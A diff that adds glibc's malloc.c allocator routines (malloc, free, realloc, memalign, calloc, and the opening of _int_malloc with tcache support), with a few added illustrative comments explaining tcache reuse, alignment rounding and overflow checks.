+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+#define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else
+#define MAYBE_INIT_TCACHE()
+#endif
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes = request2size (bytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
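+/* Illustrative user-side sketch, not part of malloc.c; it would be
+   built as a separate program against a tcache-enabled glibc (2.26+).
+   It shows the effect of the fast path above: a freed allocation of
+   the same size class is normally handed straight back out of the
+   tcache, same address, without taking any arena lock.
+
+   #include <stdio.h>
+   #include <stdlib.h>
+
+   int
+   main (void)
+   {
+     void *a = malloc (24);       // a 0x20-byte chunk on 64-bit builds
+     free (a);                    // goes into tcache bin 0
+     void *b = malloc (24);       // served by tcache_get: b == a here
+     printf ("a=%p b=%p same=%d\n", a, b, a == b);
+     free (b);
+     return 0;
+   }
+*/
+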
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+    {
+      malloc_printerr (check_action, "realloc(): invalid pointer", oldmem,
+		       ar_ptr);
+      return NULL;
+    }
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
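+
+/* Illustrative sketch, not part of the library code: the retry path above
+   falls back to the generic allocate/copy/free strategy.  The hypothetical
+   helper below expresses the same idea with nothing but the public API.
+
+     #include <stdlib.h>
+     #include <string.h>
+
+     // Grow OLD (OLD_BYTES long) to NEW_BYTES; on failure the old buffer
+     // is left untouched, mirroring realloc's contract.
+     static void *grow_buffer (void *old, size_t old_bytes, size_t new_bytes)
+     {
+       void *fresh = malloc (new_bytes);
+       if (fresh == NULL)
+         return NULL;
+       memcpy (fresh, old, old_bytes < new_bytes ? old_bytes : new_bytes);
+       free (old);
+       return fresh;
+     }
+
+   The code above additionally knows the chunk layout, which is why it can
+   copy oldsize - SIZE_SZ bytes instead of taking a caller-supplied size.  */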
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
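+
+/* Illustrative sketch, not part of the library code: because aligned_alloc
+   is a plain alias of __libc_memalign, both requests below reach
+   _mid_memalign, and an alignment that is not a power of two (e.g. 48) is
+   silently rounded up to the next one (64 when MALLOC_ALIGNMENT is 16).
+
+     #include <stdlib.h>
+     #include <malloc.h>
+
+     void *a = aligned_alloc (4096, 100);          // C11 spelling
+     void *b = memalign (4096, 100);               // traditional spelling
+
+   Alignments of MALLOC_ALIGNMENT or less are simply relayed to malloc.  */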
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
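+
+/* Worked example, not part of the library code: for a power-of-two page
+   size, ALIGN_UP is the usual round-up-with-a-mask trick, so pvalloc hands
+   _mid_memalign a whole number of pages.
+
+     size_t pagesize = 4096;                     // typical x86-64 value
+     size_t bytes    = 1;
+     size_t rounded  = (bytes + pagesize - 1) & ~(pagesize - 1);   // 4096
+
+   A 4097-byte request would round up to 8192 in the same way.  */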
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  arena_get (av, sz);
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (mem == 0 && av != NULL)
+    {
+      LIBC_PROBE (memory_calloc_retry, 1, sz);
+      av = arena_get_retry (av, sz);
+      mem = _int_malloc (av, sz);
+    }
+
+  if (av != NULL)
+    __libc_lock_unlock (av->mutex);
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing is not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8-byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
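+
+/* Illustrative sketch, not part of the library code: the
+   HALF_INTERNAL_SIZE_T test above filters out the common case where both
+   factors are small, so the division only runs when one of them uses the
+   upper half of its bits.  A hypothetical stand-alone version of the same
+   multiplication check:
+
+     #include <stddef.h>
+
+     static int mul_overflows (size_t n, size_t elem_size)
+     {
+       const size_t half = (size_t) 1 << (8 * sizeof (size_t) / 2);
+       size_t bytes = n * elem_size;      // wraps modulo SIZE_MAX + 1
+       if ((n | elem_size) < half)
+         return 0;                        // both factors small: cannot wrap
+       return elem_size != 0 && bytes / elem_size != n;
+     }
+
+   The overflow check above fails with ENOMEM exactly when this returns
+   nonzero.  */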
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  const char *errstr = NULL;
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp = *fb;
+      REMOVE_FB (fb, victim, pp);
+      if (victim != 0)
+        {
+          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
+            {
+              errstr = "malloc(): memory corruption (fast)";
+            errout:
+              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
+              return NULL;
+            }
+          check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (pp = *fb) != NULL)
+		{
+		  REMOVE_FB (fb, tc_victim, pp);
+		  if (tc_victim != 0)
+		    {
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          if (victim == 0) /* initialization check */
+            malloc_consolidate (av);
+          else
+            {
+              bck = victim->bk;
+              if (__glibc_unlikely (bck->fd != victim))
+                {
+                  errstr = "malloc(): smallbin double linked list corrupted";
+                  goto errout;
+                }
+              set_inuse_bit_at_offset (victim, nb);
+              bin->bk = bck;
+              bck->fd = bin;
+
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+              check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs in which
+     it is called frequently tend to fragment anyway.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (have_fastchunks (av))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is an exact fit, or, if this is a small request, the chunk is the remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr (check_action, "malloc(): memory corruption",
+                             chunk2mem (victim), av);
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+                  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
